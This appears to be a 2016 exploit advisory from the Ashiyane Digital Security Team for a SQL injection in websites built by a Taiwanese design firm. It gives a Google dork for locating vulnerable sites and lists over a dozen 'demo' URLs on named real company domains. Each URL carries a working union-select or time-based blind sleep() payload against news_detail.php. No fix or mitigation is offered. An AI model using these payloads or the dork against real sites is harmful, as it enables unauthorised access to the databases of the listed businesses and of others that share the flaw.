######################
# Exploit Title : Design by 任意門網頁設計 SQL Injection
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://web999.com.tw/
# Google Dork : intext:"Design by 任意門網頁設計" news_detail.php?
# Date: 27 01 2016
# Tested On : Win 10 / Google Chrome / Mozilla Firefox
#
######################
#
# demos :
# http://www.firstek.com.tw/news_detail.php?new_no=-143+union+select+1,2,3,version(),5,6,7,8,9
# http://www.junyao-food.com/news_detail.php?new_no=-168+union+select+1,2,3,version(),5,6,7,8,9,10,11
# http://www.syd-medic.com/news_detail.php?new_no=-242+union+select+1,2,3,version(),5,6,7,8,9,10
# http://www.sanyi-rubber.com/news_detail.php?new_no=-131+union+select+1,2,3,version(),5,6,7,8,9
# http://www.hanchialang.com/news_detail.php?new_no=-54+union+select+1,2,3,version(),5,6,7,8,9,10,11
# http://www.web-zoom.net/news_detail.php?d=215%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=2
# http://www.sscbannko.com/news_detail.php?d=292%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=2
# http://www.yi-yang.tw/news_detail.php?d=101%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=3
# http://tajima.com.tw/news_detail.php?d=238%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=4
# http://shandongmanto.com/news_detail.php?d=434%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=5
# http://0800666337.com/news_detail.php?d=277%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1
# http://cheng-cai168.com/news_detail.php?d=185%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1
# http://united-school.com/news_detail.php?d=516%20and%20if(mid(version(),1,1)=5,sleep(13),0x00)&no=1
######################
# discovered by : modiret
######################